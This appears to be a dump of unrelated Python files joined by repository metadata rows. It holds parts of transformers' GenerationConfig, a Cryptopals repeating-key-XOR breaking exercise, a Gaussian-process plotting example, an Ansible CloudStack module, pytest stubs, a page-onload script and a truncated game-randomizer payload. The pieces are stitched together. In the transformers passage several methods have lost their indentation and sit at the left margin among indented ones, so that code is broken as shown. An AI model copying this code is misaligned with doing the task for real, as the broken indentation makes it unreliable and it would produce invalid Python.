                In case the relevant files are located inside a subfolder of the model repo on huggingface.co, you can
                specify the folder name here.
            kwargs (`Dict[str, Any]`, *optional*):
                The values in kwargs of any keys which are configuration attributes will be used to override the loaded
                values. Behavior concerning key/value pairs whose keys are *not* configuration attributes is controlled
                by the `return_unused_kwargs` keyword parameter.
        Returns:
            [`GenerationConfig`]: The configuration object instantiated from this pretrained model.
        Examples:
        ```python
        >>> from transformers import GenerationConfig
        >>> # Download configuration from huggingface.co and cache.
        >>> generation_config = GenerationConfig.from_pretrained("gpt2")
        >>> # E.g. config was saved using *save_pretrained('./test/saved_model/')*
        >>> generation_config.save_pretrained("./test/saved_model/")
        >>> generation_config = GenerationConfig.from_pretrained("./test/saved_model/")
        >>> # You can also specify configuration names to your generation configuration file
        >>> generation_config.save_pretrained("./test/saved_model/", config_file_name="my_configuration.json")
        >>> generation_config = GenerationConfig.from_pretrained("./test/saved_model/", "my_configuration.json")
        >>> # If you'd like to try a minor variation to an existing configuration, you can also pass generation
        >>> # arguments to `.from_pretrained()`. Be mindful that typos and unused arguments will be ignored
        >>> generation_config, unused_kwargs = GenerationConfig.from_pretrained(
        ...     "gpt2", top_k=1, foo=False, return_unused_kwargs=True
        ... )
        >>> generation_config.top_k
        1
        >>> unused_kwargs
        {'foo': False}
        ```"""
        config_file_name = config_file_name if config_file_name is not None else GENERATION_CONFIG_NAME
        # pull out the kwargs that steer file resolution / telemetry before they reach `from_dict`
        resume_download = kwargs.pop("resume_download", False)
        proxies = kwargs.pop("proxies", None)
        use_auth_token = kwargs.pop("use_auth_token", None)
        subfolder = kwargs.pop("subfolder", "")
        from_pipeline = kwargs.pop("_from_pipeline", None)
        from_auto_class = kwargs.pop("_from_auto", False)
        commit_hash = kwargs.pop("_commit_hash", None)
        if use_auth_token is not None:
            # legacy auth kwarg: warn, forbid mixing with `token`, then fold into `token`
            warnings.warn(
                "The `use_auth_token` argument is deprecated and will be removed in v5 of Transformers.", FutureWarning
            )
            if token is not None:
                raise ValueError(
                    "`token` and `use_auth_token` are both specified. Please set only the argument `token`."
                )
            token = use_auth_token
        user_agent = {"file_type": "config", "from_auto_class": from_auto_class}
        if from_pipeline is not None:
            user_agent["using_pipeline"] = from_pipeline
        config_path = os.path.join(pretrained_model_name, config_file_name)
        config_path = str(config_path)
        is_local = os.path.exists(config_path)
        # Resolve the config file: plain local file, remote URL, or hub repo / cached download.
        if os.path.isfile(os.path.join(subfolder, config_path)):
            # Special case when config_path is a local file
            resolved_config_file = config_path
            is_local = True
        elif is_remote_url(config_path):
            configuration_file = config_path
            resolved_config_file = download_url(config_path)
        else:
            configuration_file = config_file_name
            try:
                # Load from local folder or from cache or download from model Hub and cache
                resolved_config_file = cached_file(
                    pretrained_model_name,
                    configuration_file,
                    cache_dir=cache_dir,
                    force_download=force_download,
                    proxies=proxies,
                    resume_download=resume_download,
                    local_files_only=local_files_only,
                    use_auth_token=token,
                    user_agent=user_agent,
                    revision=revision,
                    subfolder=subfolder,
                    _commit_hash=commit_hash,
                )
                commit_hash = extract_commit_hash(resolved_config_file, commit_hash)
            except EnvironmentError:
                # Raise any environment error raised by `cached_file`. It will have a helpful error message adapted to
                # the original exception.
                raise
            except Exception:
                # For any other exception, we throw a generic error.
                raise EnvironmentError(
                    f"Can't load the configuration of '{pretrained_model_name}'. If you were trying to load it"
                    " from 'https://huggingface.co/models', make sure you don't have a local directory with the same"
                    f" name. Otherwise, make sure '{pretrained_model_name}' is the correct path to a directory"
                    f" containing a {configuration_file} file"
                )
        try:
            # Load config dict
            config_dict = cls._dict_from_json_file(resolved_config_file)
            config_dict["_commit_hash"] = commit_hash
        except (json.JSONDecodeError, UnicodeDecodeError):
            raise EnvironmentError(
                f"It looks like the config file at '{resolved_config_file}' is not a valid JSON file."
            )
        if is_local:
            logger.info(f"loading configuration file {resolved_config_file}")
        else:
            logger.info(f"loading configuration file {configuration_file} from cache at {resolved_config_file}")
        return cls.from_dict(config_dict, **kwargs)
@classmethod
def _dict_from_json_file(cls, json_file: Union[str, os.PathLike]):
with open(json_file, "r", encoding="utf-8") as reader:
text = reader.read()
return json.loads(text)
    @classmethod
    def from_dict(cls, config_dict: Dict[str, Any], **kwargs) -> "GenerationConfig":
        """
        Instantiates a [`GenerationConfig`] from a Python dictionary of parameters.
        Args:
            config_dict (`Dict[str, Any]`):
                Dictionary that will be used to instantiate the configuration object.
            kwargs (`Dict[str, Any]`):
                Additional parameters from which to initialize the configuration object. Values in `kwargs` override
                values with the same key in `config_dict`. Pass `return_unused_kwargs=True` to also get back the
                kwargs that did not match any configuration attribute.
        Returns:
            [`GenerationConfig`]: The configuration object instantiated from those parameters.
        """
        return_unused_kwargs = kwargs.pop("return_unused_kwargs", False)
        # Those arguments may be passed along for our internal telemetry.
        # We remove them so they don't appear in `return_unused_kwargs`.
        kwargs.pop("_from_auto", None)
        kwargs.pop("_from_pipeline", None)
        # The commit hash might have been updated in the `config_dict`, we don't want the kwargs to erase that update.
        if "_commit_hash" in kwargs and "_commit_hash" in config_dict:
            kwargs["_commit_hash"] = config_dict["_commit_hash"]
        # The line below allows model-specific config to be loaded as well through kwargs, with safety checks.
        # See https://github.com/huggingface/transformers/pull/21269
        config = cls(**{**config_dict, **kwargs})
        # `update` re-applies the kwargs and reports the ones that matched no attribute
        unused_kwargs = config.update(**kwargs)
        logger.info(f"Generate config {config}")
        if return_unused_kwargs:
            return config, unused_kwargs
        else:
            return config
def dict_torch_dtype_to_str(self, d: Dict[str, Any]) -> None:
"""
Checks whether the passed dictionary and its nested dicts have a *torch_dtype* key and if it's not None,
converts torch.dtype to a string of just the type. For example, `torch.float32` get converted into *"float32"*
string, which can then be stored in the json format.
"""
if d.get("torch_dtype", None) is not None and not isinstance(d["torch_dtype"], str):
d["torch_dtype"] = str(d["torch_dtype"]).split(".")[1]
for value in d.values():
if isinstance(value, dict):
self.dict_torch_dtype_to_str(value)
def to_diff_dict(self) -> Dict[str, Any]:
"""
Removes all attributes from config which correspond to the default config attributes for better readability and
serializes to a Python dictionary.
Returns:
`Dict[str, Any]`: Dictionary of all the attributes that make up this configuration instance,
"""
config_dict = self.to_dict()
# get the default config dict
default_config_dict = GenerationConfig().to_dict()
serializable_config_dict = {}
# only serialize values that differ from the default config
for key, value in config_dict.items():
if key not in default_config_dict or key == "transformers_version" or value != default_config_dict[key]:
serializable_config_dict[key] = value
self.dict_torch_dtype_to_str(serializable_config_dict)
return serializable_config_dict
def to_dict(self) -> Dict[str, Any]:
"""
Serializes this instance to a Python dictionary.
Returns:
`Dict[str, Any]`: Dictionary of all the attributes that make up this configuration instance.
"""
output = copy.deepcopy(self.__dict__)
if "_commit_hash" in output:
del output["_commit_hash"]
# Transformers version when serializing this file
output["transformers_version"] = __version__
self.dict_torch_dtype_to_str(output)
return output
def to_json_string(self, use_diff: bool = True) -> str:
"""
Serializes this instance to a JSON string.
Args:
use_diff (`bool`, *optional*, defaults to `True`):
If set to `True`, only the difference between the config instance and the default `GenerationConfig()`
is serialized to JSON string.
Returns:
`str`: String containing all the attributes that make up this configuration instance in JSON format.
"""
if use_diff is True:
config_dict = self.to_diff_dict()
else:
config_dict = self.to_dict()
return json.dumps(config_dict, indent=2, sort_keys=True) + "\n"
def to_json_file(self, json_file_path: Union[str, os.PathLike], use_diff: bool = True):
"""
Save this instance to a JSON file.
Args:
json_file_path (`str` or `os.PathLike`):
Path to the JSON file in which this configuration instance's parameters will be saved.
use_diff (`bool`, *optional*, defaults to `True`):
If set to `True`, only the difference between the config instance and the default `GenerationConfig()`
is serialized to JSON file.
"""
with open(json_file_path, "w", encoding="utf-8") as writer:
writer.write(self.to_json_string(use_diff=use_diff))
    @classmethod
    def from_model_config(cls, model_config: PretrainedConfig) -> "GenerationConfig":
        """
        Instantiates a [`GenerationConfig`] from a [`PretrainedConfig`]. This function is useful to convert legacy
        [`PretrainedConfig`] objects, which may contain generation parameters, into a stand-alone [`GenerationConfig`].
        Args:
            model_config (`PretrainedConfig`):
                The model config that will be used to instantiate the generation config.
        Returns:
            [`GenerationConfig`]: The configuration object instantiated from those parameters.
        """
        config_dict = model_config.to_dict()
        # drop the flag so `_from_model_config=True` below is not overridden by the dict
        config_dict.pop("_from_model_config", None)
        config = cls.from_dict(config_dict, return_unused_kwargs=False, _from_model_config=True)
        # Special case: some models have generation attributes set in the decoder. Use them if still unset in the
        # generation config.
        for decoder_name in ("decoder", "generator", "text_config"):
            if decoder_name in config_dict:
                default_generation_config = GenerationConfig()
                decoder_config = config_dict[decoder_name]
                for attr in config.to_dict().keys():
                    # only inherit a decoder value when the attribute still equals its default,
                    # i.e. the top-level config did not explicitly set it
                    if attr in decoder_config and getattr(config, attr) == getattr(default_generation_config, attr):
                        setattr(config, attr, decoder_config[attr])
        return config
def update(self, **kwargs):
"""
Updates attributes of this class instance with attributes from `kwargs` if they match existing atributtes,
returning all the unused kwargs.
Args:
kwargs (`Dict[str, Any]`):
Dictionary of attributes to tentatively update this class.
Returns:
`Dict[str, Any]`: Dictionary containing all the key-value pairs that were not used to update the instance.
"""
to_remove = []
for key, value in kwargs.items():
if hasattr(self, key):
setattr(self, key, value)
to_remove.append(key)
# remove all the attributes that were updated, without modifying the input dict
unused_kwargs = {key: value for key, value in kwargs.items() if key not in to_remove}
return unused_kwargs
| [
"noreply@github.com"
] | pytorch-tpu.noreply@github.com |
00c989258ab015ff4cdd1d241d09ff53a6d04033 | 3c4a345c530d8a9df163fad6c438e504e196dda0 | /Challenge6.py | 1addee14b3688487646a776c43d0baf02040f09d | [] | no_license | vebzical/kryptokamut | 9d096810e987bc730f5ed710468b2e2b83401bd0 | 5363185d09199608600c9d1bc7c71e51311a1d84 | refs/heads/master | 2020-05-09T15:16:12.247060 | 2019-04-15T09:47:39 | 2019-04-15T09:47:39 | 181,227,713 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,138 | py | #/usr/bin/python
import base64
import freqAnalysis
def XOR(input, key):
    """Byte-wise XOR of two byte strings, truncated to the shorter of the two."""
    return bytes(a ^ b for a, b in zip(input, key))
def findKeyLen(chiphertext):
    """Estimate the repeating-XOR key length (2..40) for `chiphertext`.

    For each candidate key size, the ciphertext is split into keysize-sized
    chunks and the normalized Hamming distance between consecutive
    non-overlapping full chunks is averaged; the key size with the smallest
    average distance is returned.

    Fixes over the original implementation:
      * no longer mutates the chunk list while index-iterating it, which
        skipped pairs and (via `list.remove`, which removes by value) could
        delete the wrong element when two chunks were byte-identical;
      * the short trailing chunk is excluded, so every distance is computed
        over exactly `keysize` bytes before normalizing;
      * candidate sizes with fewer than two full chunks are skipped instead
        of raising ZeroDivisionError.
    """
    scored = []
    for keysize in range(2, 41):
        chunks = [chiphertext[i:i + keysize] for i in range(0, len(chiphertext), keysize)]
        # keep only full-length chunks so dividing by keysize is a fair normalization
        chunks = [c for c in chunks if len(c) == keysize]
        distances = [
            calcHammingDistance(chunks[i], chunks[i + 1]) / keysize
            for i in range(0, len(chunks) - 1, 2)
        ]
        if distances:
            scored.append([sum(distances) / len(distances), keysize])
    # smallest normalized distance wins; ties resolve to the smaller keysize
    return min(scored, key=lambda pair: pair[0])[1]
def calcHammingDistance(str1, str2):
    """Number of differing bits between two byte strings.

    Inputs of unequal length are truncated to the shorter one, matching the
    pairing behavior of zip() in the original XOR helper.
    """
    distance = 0
    for a, b in zip(str1, str2):
        distance += bin(a ^ b).count("1")
    return distance
def XORSingleChar(text, key):
    """XOR every byte of `text` with the single byte value `key` (0..255)."""
    return bytes(b ^ key for b in text)
def XORSingleCharBruteforce(input):
    """Try every single-byte key against `input` and return the best candidate.

    Returns a list ``[plaintext_bytes, key, english_score]``; the highest
    English-frequency score wins, with ties resolving to the lowest key
    (same as the original stable descending sort).
    """
    candidates = []
    for key in range(256):
        plaintext = XORSingleChar(input, key)
        score = freqAnalysis.englishFreqMatchScore(str(plaintext))
        candidates.append([plaintext, key, score])
    return max(candidates, key=lambda c: c[2])
def XORRepeatingKey(input, key):
    """XOR `input` against `key` repeated cyclically to cover its full length."""
    return bytes(byte ^ key[i % len(key)] for i, byte in enumerate(input))
# Cryptopals challenge 6: break repeating-key XOR.
# Read the base64 ciphertext from disk, stripping line breaks.
input = ""
with open('6.txt', 'r') as f:
    for line in f:
        input += line.rstrip()
chiphertext = base64.b64decode(input)
# Estimate the key length from normalized Hamming distances between chunks.
keylen = findKeyLen(chiphertext)
key = b""
plaintexts = []
# Transpose the ciphertext into one column per key byte, then solve each
# column as a single-byte XOR cipher to recover that key byte.
for i in range(keylen):
    block = b''
    for j in range(i, len(chiphertext), keylen):
        block += bytes([chiphertext[j]])
    key += bytes([XORSingleCharBruteforce(block)[1]])
# Decrypt with the recovered key and score the result.
result = XORRepeatingKey(chiphertext, key)
plaintexts.append([result,key,freqAnalysis.englishFreqMatchScore(str(result))])
# Print the best-scoring candidate(s): [plaintext, key, score].
maxscore = max(plaintexts, key=lambda x:x[2])[2]
for i in sorted(plaintexts, key=lambda x: x[2], reverse=True):
    if i[2] == maxscore:
        print(i)
| [
"root@localhost.localdomain"
] | root@localhost.localdomain |
04dab0209f29ce27605490d094bcc4294c4d3171 | 3cbb592ca471540cc704a547f71f9d6b84669976 | /python/infpy/gp/examples/simple_example.py | f3ecb0972d8eb65d6185c5d3a3f8129c66167827 | [
"BSD-2-Clause"
] | permissive | JohnReid/infpy | a9c896a556abed8ed3abd5e56ca86d31a7a731c0 | 1b825ba7a60f0a0489df5f41b273374aef628a60 | refs/heads/master | 2021-01-01T16:56:27.743588 | 2018-06-28T21:44:17 | 2018-06-28T21:44:17 | 13,087,025 | 5 | 3 | null | null | null | null | UTF-8 | Python | false | false | 1,824 | py | #
# Copyright John Reid 2008
#
import numpy
import pylab
import infpy.gp
def save_fig(prefix):
    """Save the current matplotlib figure as both <prefix>.png and <prefix>.eps."""
    for extension, fmt in (("png", "PNG"), ("eps", "EPS")):
        pylab.savefig("%s.%s" % (prefix, extension), format=fmt)
# Generate some noisy data from a modulated sin curve: y = 10*sin(x)/x plus
# small Gaussian noise, over the input range [x_min, x_max].
x_min, x_max = 10.0, 100.0
X = infpy.gp.gp_1D_X_range(x_min, x_max)  # input domain
Y = 10.0 * numpy.sin(X[:, 0]) / X[:, 0]  # noise free output
Y = infpy.gp.gp_zero_mean(Y)  # shift so mean=0.
e = 0.03 * numpy.random.normal(size=len(Y))  # noise
f = Y + e  # noisy output
# plot the noise-free curve (blue line) and the noisy samples (red squares)
pylab.figure()
pylab.plot(X[:, 0], Y, 'b-', label='Y')
pylab.plot(X[:, 0], f, 'rs', label='f')
pylab.legend()
save_fig('simple-example-data')
pylab.close()
def predict_values(K, file_tag, learn=False):
    """Fit a Gaussian process with kernel K to the module-level data (X, f),
    optionally learn K's hyperparameters when learn=True, plot predictions
    over [x_min-10, x_max+10] and save the figure under file_tag.
    NOTE: relies on the module globals X, f, x_min and x_max defined above.
    """
    gp = infpy.gp.GaussianProcess(X, f, K)
    if learn:
        infpy.gp.gp_learn_hyperparameters(gp)
    pylab.figure()
    # 90 prediction points across the (slightly extended) input range
    infpy.gp.gp_1D_predict(gp, 90, x_min - 10., x_max + 10.)
    save_fig(file_tag)
    pylab.close()
# import short forms of GP kernel names
import infpy.gp.kernel_short_names as kernels
# create a kernel composed of a squared exponential kernel and a small noise term
K = kernels.SE() + kernels.Noise(.1)
predict_values(K, 'simple-example-se')
# Try a different kernel with a shorter characteristic length scale (0.1)
K = kernels.SE([.1]) + kernels.Noise(.1)
predict_values(K, 'simple-example-se-shorter')
# Try another kernel with a lot more noise (noise term 1.0 instead of 0.1)
K = kernels.SE([4.]) + kernels.Noise(1.)
predict_values(K, 'simple-example-more-noise')
# Try to learn kernel hyper-parameters starting from length scale 4.0
K = kernels.SE([4.0]) + kernels.Noise(.1)
predict_values(K, 'simple-example-learnt', learn=True)
| [
"johnbaronreid@netscape.net"
] | johnbaronreid@netscape.net |
26c2daefb72b9b841d51c34f8ad6f2f23053f412 | 1fe0b680ce53bb3bb9078356ea2b25e572d9cfdc | /venv/lib/python2.7/site-packages/ansible/modules/cloud/cloudstack/cs_zone_facts.py | 92c815e95756f4fd8ec4bffffdc80dfdaf421e53 | [
"MIT"
] | permissive | otus-devops-2019-02/devopscourses_infra | 1929c4a9eace3fdb0eb118bf216f3385fc0cdb1c | e42e5deafce395af869084ede245fc6cff6d0b2c | refs/heads/master | 2020-04-29T02:41:49.985889 | 2019-05-21T06:35:19 | 2019-05-21T06:35:19 | 175,780,457 | 0 | 1 | MIT | 2019-05-21T06:35:20 | 2019-03-15T08:35:54 | HCL | UTF-8 | Python | false | false | 4,772 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2016, René Moser <mail@renemoser.net>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['stableinterface'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: cs_zone_facts
short_description: Gathering facts of zones from Apache CloudStack based clouds.
description:
- Gathering facts from the API of a zone.
- Sets Ansible facts accessable by the key C(cloudstack_zone) and since version 2.6 also returns results.
version_added: '2.1'
author: René Moser (@resmo)
options:
name:
description:
- Name of the zone.
type: str
required: true
aliases: [ zone ]
extends_documentation_fragment: cloudstack
'''
EXAMPLES = '''
- name: Gather facts from a zone
cs_zone_facts:
name: ch-gva-1
register: zone
delegate_to: localhost
- name: Show the returned results of the registered variable
debug:
var: zone
- name: Show the facts by the ansible_facts key cloudstack_zone
debug:
var: cloudstack_zone
'''
RETURN = '''
---
id:
description: UUID of the zone.
returned: success
type: str
sample: 04589590-ac63-4ffc-93f5-b698b8ac38b6
name:
description: Name of the zone.
returned: success
type: str
sample: zone01
dns1:
description: First DNS for the zone.
returned: success
type: str
sample: 8.8.8.8
dns2:
description: Second DNS for the zone.
returned: success
type: str
sample: 8.8.4.4
internal_dns1:
description: First internal DNS for the zone.
returned: success
type: str
sample: 8.8.8.8
internal_dns2:
description: Second internal DNS for the zone.
returned: success
type: str
sample: 8.8.4.4
dns1_ipv6:
description: First IPv6 DNS for the zone.
returned: success
type: str
sample: "2001:4860:4860::8888"
dns2_ipv6:
description: Second IPv6 DNS for the zone.
returned: success
type: str
sample: "2001:4860:4860::8844"
allocation_state:
description: State of the zone.
returned: success
type: str
sample: Enabled
domain:
description: Domain the zone is related to.
returned: success
type: str
sample: ROOT
network_domain:
description: Network domain for the zone.
returned: success
type: str
sample: example.com
network_type:
description: Network type for the zone.
returned: success
type: str
sample: basic
local_storage_enabled:
description: Local storage offering enabled.
returned: success
type: bool
sample: false
securitygroups_enabled:
description: Security groups support is enabled.
returned: success
type: bool
sample: false
guest_cidr_address:
description: Guest CIDR address for the zone
returned: success
type: str
sample: 10.1.1.0/24
dhcp_provider:
description: DHCP provider for the zone
returned: success
type: str
sample: VirtualRouter
zone_token:
description: Zone token
returned: success
type: str
sample: ccb0a60c-79c8-3230-ab8b-8bdbe8c45bb7
tags:
description: List of resource tags associated with the zone.
returned: success
type: dict
sample: [ { "key": "foo", "value": "bar" } ]
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.cloudstack import (
AnsibleCloudStack,
cs_argument_spec,
)
class AnsibleCloudStackZoneFacts(AnsibleCloudStack):
    """Gathers facts about a single CloudStack zone.
    ``self.returns`` maps CloudStack API response keys to the snake_case fact
    names exposed to Ansible; keys not listed here are handled by the base
    class's common return mapping.
    """
    def __init__(self, module):
        super(AnsibleCloudStackZoneFacts, self).__init__(module)
        # API field name -> returned fact name
        self.returns = {
            'dns1': 'dns1',
            'dns2': 'dns2',
            'internaldns1': 'internal_dns1',
            'internaldns2': 'internal_dns2',
            'ipv6dns1': 'dns1_ipv6',
            'ipv6dns2': 'dns2_ipv6',
            'domain': 'network_domain',
            'networktype': 'network_type',
            'securitygroupsenabled': 'securitygroups_enabled',
            'localstorageenabled': 'local_storage_enabled',
            'guestcidraddress': 'guest_cidr_address',
            'dhcpprovider': 'dhcp_provider',
            'allocationstate': 'allocation_state',
            'zonetoken': 'zone_token',
        }
    def get_zone(self):
        # NOTE(review): this override only delegates to the base class and
        # could be removed; kept for explicitness.
        return super(AnsibleCloudStackZoneFacts, self).get_zone()
def main():
    """Module entry point: parse arguments, query the zone and return facts.
    Sets both the Ansible fact `cloudstack_zone` and the plain module result.
    """
    argument_spec = cs_argument_spec()
    argument_spec.update(dict(
        zone=dict(required=True, aliases=['name']),
    ))
    # read-only module, so check mode is always safe
    module = AnsibleModule(
        argument_spec=argument_spec,
        supports_check_mode=True,
    )
    acs_zone_facts = AnsibleCloudStackZoneFacts(module=module)
    result = acs_zone_facts.get_result_and_facts(
        facts_name='cloudstack_zone',
        resource=acs_zone_facts.get_zone()
    )
    module.exit_json(**result)
if __name__ == '__main__':
    main()
| [
"skydevapp@gmail.com"
] | skydevapp@gmail.com |
7707734bcaccebbdf25b7547c1dcf12bc305d2b3 | d8c899ca71e511ec0b60b79f11eeb08077ad7b7b | /stubs/pytest/mark.pyi | d1733cfb0524484bc786f3bdab20d218b6b2edca | [
"Apache-2.0"
] | permissive | Michaelll123/sensibility | ff9972baa979745e91f96a1e4953ebe42d7258b5 | 7436ac2fd4faf100b5e21c28b61a431adce06091 | refs/heads/master | 2023-08-30T05:57:05.750677 | 2021-11-14T09:45:57 | 2021-11-14T09:45:57 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 295 | pyi | from typing import Callable
# Type stub for pytest's `mark.skip`: usable both as a bare decorator
# (`@mark.skip`) and parametrized (`@mark.skip(reason=...)`).
class skip:
    def __init__(self, test: Callable=None, reason: str=None) -> None: ...
    def __call__(self, test: Callable) -> Callable: ...
# Stub for `mark.skipif(condition, reason=...)`: returns a decorator.
def skipif(condition: bool, reason: str=None) -> Callable[[Callable], Callable]: ...
# Stub for `mark.xfail` used as a bare decorator. The original declared the
# parameter as bare `Callable`, shadowing the typing import and leaving the
# decorated-test parameter unannotated; it is named and annotated here.
def xfail(test: Callable) -> Callable: ...
| [
"easantos@ualberta.ca"
] | easantos@ualberta.ca |
8888104655043e44fc68662cec6bd63cc8bbddee | fced25b055ec68ee522bd156c3be5902172beb55 | /Pages/logs/Actions-logs/onload.py | c209484f123b9b8aeafa573b8463db94067a17c0 | [] | no_license | EAC-Technology/eApp-Builder | 3cff5576139b78fc507406e31a4b5201eab436b7 | c3bbadde24330fb2dff4aa2c32cc6b11e044fbc9 | refs/heads/master | 2021-08-16T23:56:54.241674 | 2017-11-20T14:15:10 | 2017-11-20T14:15:10 | 111,399,334 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,057 | py | """
"""
from ProSuiteLogsPage import ProSuiteLogsPage
# Page onload handler for the ProSuite logs screen.
# NOTE(review): `self` is not defined in this file — it appears to be injected
# by the eApp-Builder page framework as the current page context; confirm.
page = ProSuiteLogsPage(self)
# Map logical widget names used by ProSuiteLogsPage to the concrete
# framework widgets of this page (toolbar buttons, dialogs, popup forms).
page.vdom_objects = {
    "growl": self.growl,
    "logs.data": self.logs_cnt.hpt,
    "topbar.download.btn": self.dwnloadlogs_btn,
    "topbar.autoupdate.btn": self.autoupdate.checkbtn,
    "dialogs.download": self.dwnload_logs_dialog,
    "dialogs.download.close": self.dwnload_logs_dialog.close_btn,
    "popup.loglevel": self.loglevelsform,
    "popup.loglevel.form": self.loglevelsform,
    "popup.loglevel.form.list": self.loglevelsform.lv,
    "popup.loglevel.form.hide": self.loglevelsform.hidebtn,
    "popup.loglevel.form.reset": self.loglevelsform.resetbtn,
    "popup.loglevel.form.submit": self.loglevelsform.submitbtn,
    "popup.loggers": self.loggersform,
    "popup.loggers.form": self.loggersform,
    "popup.loggers.form.list": self.loggersform.lg,
    "popup.loggers.form.reset": self.loggersform.resetbtn,
    "popup.loggers.form.hide": self.loggersform.hidebtn,
    "popup.loggers.form.submit": self.loggersform.submitbtn,
    }
page.run('onload') | [
"alain.abraham@web-atrio.com"
] | alain.abraham@web-atrio.com |
4137fadb32c4261d86e597d9593e759c7a36561c | 3c9e5a16b1625faf82e2e714aff119ef49033d50 | /pyz3r/customizer.py | a99d223ea06d60991a2a63a3c54122966bf14d4e | [
"Apache-2.0"
] | permissive | tcprescott/pyz3r | 144ef0dacec1ed76e10df6a8acb350fb843e2847 | fb90559650098090a9e800ca3d4b3d337473942a | refs/heads/master | 2023-09-05T09:26:56.927172 | 2023-09-05T04:45:37 | 2023-09-05T04:45:37 | 163,603,582 | 24 | 8 | Apache-2.0 | 2023-08-29T03:08:51 | 2018-12-30T17:02:35 | Python | UTF-8 | Python | false | false | 16,726 | py | import copy
import math
# Default request payload for the alttpr.com customizer.
# convert2settings() deep-copies this dict and overlays any non-null values
# found in a customizer-settings.json save, so every entry here acts as the
# default used when the save file does not specify a value.
BASE_CUSTOMIZER_PAYLOAD = {
    "glitches": "none",
    "item_placement": "advanced",
    "dungeon_items": "standard",
    "accessibility": "items",
    "goal": "ganon",
    "crystals": {
        "ganon": "7",
        "tower": "7"
    },
    "mode": "open",
    "weapons": "randomized",
    "hints": "on",
    "item": {
        "pool": "normal",
        "functionality": "normal"
    },
    "tournament": False,
    "spoilers": "on",
    "lang": "en",
    "allow_quickswap": False,
    "enemizer": {
        "boss_shuffle": "none",
        "enemy_shuffle": "none",
        "enemy_damage": "default",
        "enemy_health": "default",
        "pot_shuffle": "off"
    },
    "name": "",
    "notes": "",
    "l": {},
    "eq": ["BossHeartContainer", "BossHeartContainer", "BossHeartContainer"],
    # Enemy prize packs "0"-"6" plus the special pull/crab/stun/fish drops;
    # "auto_fill" leaves the slot for the randomizer to fill.
    "drops": {
        "0": ["auto_fill", "auto_fill", "auto_fill", "auto_fill", "auto_fill", "auto_fill", "auto_fill", "auto_fill"],
        "1": ["auto_fill", "auto_fill", "auto_fill", "auto_fill", "auto_fill", "auto_fill", "auto_fill", "auto_fill"],
        "2": ["auto_fill", "auto_fill", "auto_fill", "auto_fill", "auto_fill", "auto_fill", "auto_fill", "auto_fill"],
        "3": ["auto_fill", "auto_fill", "auto_fill", "auto_fill", "auto_fill", "auto_fill", "auto_fill", "auto_fill"],
        "4": ["auto_fill", "auto_fill", "auto_fill", "auto_fill", "auto_fill", "auto_fill", "auto_fill", "auto_fill"],
        "5": ["auto_fill", "auto_fill", "auto_fill", "auto_fill", "auto_fill", "auto_fill", "auto_fill", "auto_fill"],
        "6": ["auto_fill", "auto_fill", "auto_fill", "auto_fill", "auto_fill", "auto_fill", "auto_fill", "auto_fill"],
        "pull": ["auto_fill", "auto_fill", "auto_fill"],
        "crab": ["auto_fill", "auto_fill"],
        "stun": ["auto_fill"],
        "fish": ["auto_fill"]
    },
    # Fine-grained customizer overrides: rule toggles, glitched-logic flags,
    # and the full item/drop pool counts.
    "custom": {
        "item.Goal.Required": "",
        "item.require.Lamp": False,
        "item.value.BlueClock": "",
        "item.value.GreenClock": "",
        "item.value.RedClock": "",
        "item.value.Rupoor": "",
        "prize.crossWorld": True,
        "prize.shuffleCrystals": True,
        "prize.shufflePendants": True,
        "region.bossNormalLocation": True,
        "region.wildBigKeys": False,
        "region.wildCompasses": False,
        "region.wildKeys": False,
        "region.wildMaps": False,
        "rom.dungeonCount": "off",
        "rom.freeItemMenu": False,
        "rom.freeItemText": False,
        "rom.mapOnPickup": False,
        "rom.timerMode": "off",
        "rom.timerStart": "",
        "rom.rupeeBow": False,
        "rom.genericKeys": False,
        "spoil.BootsLocation": False,
        "canBombJump": False,
        "canBootsClip": False,
        "canBunnyRevive": False,
        "canBunnySurf": False,
        "canDungeonRevive": False,
        "canFakeFlipper": False,
        "canMirrorClip": False,
        "canMirrorWrap": False,
        "canOneFrameClipOW": False,
        "canOneFrameClipUW": False,
        "canOWYBA": False,
        "canSuperBunny": False,
        "canSuperSpeed": False,
        "canWaterFairyRevive": False,
        "canWaterWalk": False,
        "item": {
            "count": {
                "BottleWithRandom": 4,
                "Nothing": 0,
                "L1Sword": 0,
                "L1SwordAndShield": 0,
                "MasterSword": 0,
                "L3Sword": 0,
                "L4Sword": 0,
                "BlueShield": 0,
                "RedShield": 0,
                "MirrorShield": 0,
                "FireRod": 1,
                "IceRod": 1,
                "Hammer": 1,
                "Hookshot": 1,
                "Bow": 0,
                "Boomerang": 1,
                "Powder": 1,
                "Bombos": 1,
                "Ether": 1,
                "Quake": 1,
                "Lamp": 1,
                "Shovel": 1,
                "OcarinaInactive": 1,
                "CaneOfSomaria": 1,
                "Bottle": 0,
                "PieceOfHeart": 24,
                "CaneOfByrna": 1,
                "Cape": 1,
                "MagicMirror": 1,
                "PowerGlove": 0,
                "TitansMitt": 0,
                "BookOfMudora": 1,
                "Flippers": 1,
                "MoonPearl": 1,
                "BugCatchingNet": 1,
                "BlueMail": 0,
                "RedMail": 0,
                "Bomb": 0,
                "ThreeBombs": 16,
                "Mushroom": 1,
                "RedBoomerang": 1,
                "BottleWithRedPotion": 0,
                "BottleWithGreenPotion": 0,
                "BottleWithBluePotion": 0,
                "TenBombs": 1,
                "OneRupee": 2,
                "FiveRupees": 4,
                "TwentyRupees": 28,
                "BowAndArrows": 0,
                "BowAndSilverArrows": 0,
                "BottleWithBee": 0,
                "BottleWithFairy": 0,
                "BossHeartContainer": 10,
                "HeartContainer": 1,
                "OneHundredRupees": 1,
                "FiftyRupees": 7,
                "Heart": 0,
                "Arrow": 1,
                "TenArrows": 12,
                "SmallMagic": 0,
                "ThreeHundredRupees": 5,
                "BottleWithGoldBee": 0,
                "OcarinaActive": 0,
                "PegasusBoots": 1,
                "BombUpgrade5": 0,
                "BombUpgrade10": 0,
                "ArrowUpgrade5": 0,
                "ArrowUpgrade10": 0,
                "HalfMagic": 1,
                "QuarterMagic": 0,
